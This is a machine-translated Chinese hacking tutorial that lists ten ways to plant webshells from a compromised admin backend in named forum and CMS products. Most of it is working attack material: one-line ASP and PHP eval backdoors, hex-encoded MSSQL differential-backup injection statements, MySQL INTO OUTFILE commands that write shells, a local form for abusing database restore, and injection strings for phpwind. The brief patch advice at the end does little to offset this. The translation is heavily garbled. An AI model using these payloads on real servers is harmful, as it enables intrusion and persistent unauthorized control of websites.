From the background to give the webshell ten tips great summary-vulnerability warning-the black bar safety net

ID MYHACK58:6220055894
Type myhack58
Reporter 佚名
Modified 2005-12-29T00:00:00



Move online pass vulnerability, I believe we scored a lot of chickens. Can say is move network make upfile. asp Upload file filter is not strict, the vulnerability evident in the world, now that the vulnerability has been substantially more difficult to meet, do not rule out some small sites still exist for this vulnerability. In the take a stand process, we often fee of nine cattle two Tiger force to get to the administrator account and password, and smoothly into the background, although at this time and get to the website webshell are one step away, but still there are many newbies because the Can't think of a suitable method and was shut out. Therefore, we put the common from the background to give the webshell of the method were summarized and induction, the General case has the following ten aspects.

Note: how to into the background, not the scope of this document, the specific methods did not say, against everyone went to their own play. This below with reference to the previous aspects of data and information, with thanks.

First, the direct upload to get webshell This for php and jsp, some of the procedures more common, MolyX BOARD is one example, directly on the mood icon in the Manage upload. php type, although there is no hint, in fact, has been successful, the uploaded file url should be http://forums/images/smiles/down, a while ago with all the game Station and Netease jsp system vulnerabilities can directly upload jsp file. The file name is the original file name, bo-blog the background can be uploaded directly. php file, upload the file path prompt. And a year ago is very popular upfile. asp vulnerability(dynamic network 5. 0 and 6. 0, early many of the whole Station system), due to the filtering the uploaded file is not strict, causing the user can directly Upload a webshell to a website to any writable directory, so get to the website administrators Control permissions.

Second, Add to modify the upload type

Now a lot of the script upload module not only allows you to upload a legitimate file type, and most of the system is allowed to add upload type, bbsxp the background can add a asa|asP type ewebeditor background can also be added asa type,by modifying the we can directly upload the asa suffix webshell,there is a case to be filtered. asp can be added. aspasp file type to upload to get webshell on. php the background of the system, we can add. php. g1f the upload type, this is the php one characteristic,the last of which as long as not known file type, php will be php. g1f as. php to run properly,so can also be successful to get to the shell. LeadBbs3. 1 4 background, get webshell method is: in the upload type to increase the asp, to note, asp is behind there is a blank space, then the previous upload ASP of the horse, of course, also want to later add a space to!

Third, the use of background management functions written webshell

Upload vulnerability substantially complementary to the also almost up,so we go into the background after can also modify the file to write the webshell and. Comparison of typical dvbbs6. 0, there leadbbs2. 8 8, etc., directly in the background to modify the configuration file, write the suffix is asp file. And LeadBbs3. 1 4 background, get webshell another method is: add a new affiliate link,the website name of the place written on the ice Fox the pony, the pony before and you want to just input some characters, http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell the.

Fourth, use the Admin to configure the file to write the webshell Use"""":""//"and other symbols to construct most ponies write program configuration file, joekoe Forum, XX classmates, boiling prospect news system, COCOON Counter statistics programs, and so on, there are many php application can be, COCOON Counter statistics program, for example, 在管理邮箱处添上":eval request(chr (3 5))//, in the preparation of the file is webmail="\":eval request(chr(3 5))//", There is a method that is written on the"%><%eval request(chr(3 5))%><%',this will form the front and rear corresponding, the pony will run. < a% eval request(chr(3 5))%>can be used lake2 eval the sender as well as the latest 2 0 0 6 client to connect, it is noted that the database plug horse when you want to choose the former. Then, as the movable-2 0 0 5, The to articles center Manager-Top Menu Settings-menu other special effects, insert the word horse"%><%execute request("l")%><%', save the top section of the menu the parameter setting is successful, we will give the horse the address http://site/admin/rootclass_menu_config. asp.

**Fifth, the use of the back-end database backup and restore to get webshell

** The main use of the background of the access database“backup database”or“Restore Database”function, the“BACKUP DATABASE PATH”variable is not filtered leads can take any file suffix changed to asp, so to get webshell, the msssql version of the program on the direct application of the access version of the code that cause the sql version still can be used. You can also backup the site the asp file for the other suffixes such as. txt file, so you can view and get the pages source code and get more program information, to increase access to webshell opportunities. In actual use often encounter no upload functionality, but with asp the system running, use this method to view the source code to get the database location for the database plug-maleic create opportunities, dynamic network Forum will have an ip address of the database, in the background of ip management can be inserted into the pony and then back up into. asp files can be. In talk about breakthrough in the upload detection method, many asp programs even changed the suffix of the name will prompt the files illegally, by in. the asp file header plus the gif89a modify the suffix for the gif to fool the asp program to detect and achieve the upload of the object, there is a is to use Notepad to open the picture file, just paste part of the Copy to the asp Trojan file header, modifying a gif suffix after the upload you can also break detection, and then back up to. the asp file is successfully webshell。

Sixth, the use of database compression function The data can be preventing the download fails so that the insertion database of the most pony run successfully, the more typical is the loveyuki the L-BLOG, in friendship to add to the url to write on the < %eval request (chr(3 5))%>, After submit, in the database operation in the compressed database can be successfully compressed. asp file, with the ocean's most pony of the eval client even will get a webshell in.

Seventh, asp+mssql system

Here need to mention that the moving web mssql edition, but can direct the local commit to the backup. First, in post that upload one to write a asp code in the fake picture, and then remember its upload path. Write a local submission of the form, the code is as follows:

<form action=http://website/bbs/admin_data. asp? action=RestoreData&act=Restore method="post"> < p > The uploaded file position:<input name="Dbpath" type="text" size="8 0"></p> <p>you want to copy to the location: of < input name="backpath" type="text" size="8 0"></p> <p><input type="submit" value="submit"></p> </form>

Save As. htm performed locally. Put a false image upload path in the“uploaded file location”where you want to backup WebShell relative path to fill in the“to be copied to the location”where the Submit will get our lovely WebShell, recovery code and such like, modify the relevant place on it. Not encountered after the station executes mssql command more powerful asp program background, dynamic network of database restore and backup is a decoration, can not execute the sql command backup webshell, can only perform some simple query command. You can use mssql injection differential backup webshell, the General background is to show the absolute path, as long as with the injection point basically can be a differential backup is successful. The following is a differential backup of the main statements of the code, The use of the movement network 7. 0 of the injection vulnerabilities you can use differential backups a webshell, you can use the use of the above-mentioned method, the conn. asp file backup into. txt file and get the database name.

A differential backup of the main code:

;declare @a sysname,@s varchar(4 0 0 0) select @a=db_name(),@s=0x626273 backup database @a to disk=@s-- ;Drop table [heige];create table [dbo]. [heige] ([cmd] [image])-- ;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226c2229253e)-- ;declare @a sysname,@s varchar(4 0 0 0) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

This code, 0x626273 is to backup the library name bbs hex, can be other names such as bbs. bak; 0x3C2565786563757465207265717565737428226c2229253e < %execute request("l")% > The hex is the lp most ponies; the 0x643A5C7765625C312E617370 is d:\web\1. asp hex,that is, you want to backup webshell path. Of course you can also use the more common backup way to get webshell, the only drawback is that after the backup file is too large, if the BACKUP DATABASE has the anti-download of data sheet, or have the wrong asp code, The backup out of the webshell will not run successfully, the use of a differential backup is a relatively high success rate of the method, and greatly reduce the backup file size.

Eighth, php+mysql system

Background need to have a mysql data query function,we can use it to perform a SELECT ... INTO OUTFILE query output php file, because all the data is stored in mysql, so we can through the normal means of putting our webshell code into mysql using SELECT... INTO OUTFILE statement to export shell. In mysql the operation in the input select 0x3C3F6576616C28245F504F53545B615d293b3f3e from mysql. user into outfile 'path’ can be obtained one of<? eval($_POST[a]);?> Most ponies' 0x3C3F6576616C28245F504F53545B615d293b3f3e is We of<? eval($_POST[a]);?> Hex, this method of phpmyadmin is relatively common, the first use of the phpmyadmin path disclosure vulnerability, the more typical 是 http://url/phpmyadmin/libraries/select_lang.lib.php the.

You can storm out of the path of the php environment is relatively easy to storm out of absolute path: on. 提 一点 的 是 遇到 是 mysql 在 win 系统 下 路径 应该 这样 写 d:\\wwwroot\\a.php the. The following method is the more common one export webshell method, you can also write a vbs to add a system administrator's script to export to the Startup folder, the system re-starting after it will add a administrator account

CREATE TABLE a(cmd text NOT NULL) INSERT INTO a(cmd) VALUES('<? fputs(fopen("./ a.php","w"),"<? eval([$](<>)_POST[a]);?>")?>') select cmd from a into outfile '路径 /b.php' DROP TABLE IF EXISTS a Access b. php will generate a < a? eval($_POST[a]);?> Most ponies. If you encounter can execute the php command is much simpler,a typical representative is BO-BLOG,in the background the php command box enter the following code: <? $sa = fopen("./ up/saiy.php","w"); fwrite($sa,"<? eval([$](<>)_POST[a]);?".">"); fclose($sa); ? > the

It will be in the up directory generates a file named saiy. php content is<? eval($_POST[a]);?> The minimum php Trojans, and finally with lanker client to connect. Practice to take into account whether the folder has write permissions. Or enter this code in<? fputs(fopen("./ a.php","w"),"<? eval([$](<>)_POST[a]);?>")?> Will be in the current directory to generate a. php most ponies. Nine, phpwind Forum from the back office to the webshell of three ways

Method 1 template method

Into the background, the template style settings in just one line write the code, remember, this code must be against the left side of the line write, the code previously may not have any of the characters.

EOT; eval($a); print of < OF < of < EOT

而后 得到 一 个 shell 为 http:// 网站 /bbs/index.php the.

Party starts 2 profanity filter method

Enter the security management ◇ bad words filter. Add bad words to write a’]=’aa’;eval($_POST[’a’]);//

Replaced with there can feel free to write, 而后得到一个shell地址为http://网站/bbs/data/bbscache/wordsfb.php the.

3 user level management

The newmembersset, titles you can just write, but don't write Single or double quotation marks special symbols, upgrade the picture number is written a’;eval($_POST[’a’]);// upgrade points you can still feel free to write. 而后 得到 一 个 shell 地址 为 http:// 网站 /bbs/data/bbscache/level.php the.

The above three ways to get webshellr password is a,for the lanker of a word the back door of the service end.

Ten, you can also use the website to access the counting system records to obtain the webshell

The most obvious is a private server within the program of the Al River counting program, by http://website/stat. asp? style=text&referer= Code content&screenwidth=1 0 2 4 direct Submit, you can put the code directly inserted into the counting system of the database, and this system default database for the count#. asa, we can through http://site/count%2 3. asa access to get webshell, since the Al River counting program filtered%and+, the most ponies into the < SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT > the eval(Request("1"))</SCRIPT>replace the Code content of the submission, and then use the lake2 eval client to submit, it is worth mentioning that if the intake to the count of the background, can be cleaned up at some point of the data, once inserted into the asp Trojan fails, you can cleanup the database again.


Since this article relates to the version of the code a lot, so it is impossible to provide a perfect solution. The ability to Can for this article mentioned the vulnerability of the file for the appropriate patch, if the vulnerability file does not affect system use you can delete this file. If you do not patch, may be related to the official website to download the latest patch to fix the update. Please also everyone can always pay attention to the safety network released the latest announcement, if yourself find related vulnerability may also notify the official website.


In fact, from the background to give the webshell skills should be there are a lot of, the key is to see how everyone flexible use, by analogy, the hope this method can serve to initiate action. Guys come on Now, let the server control the end!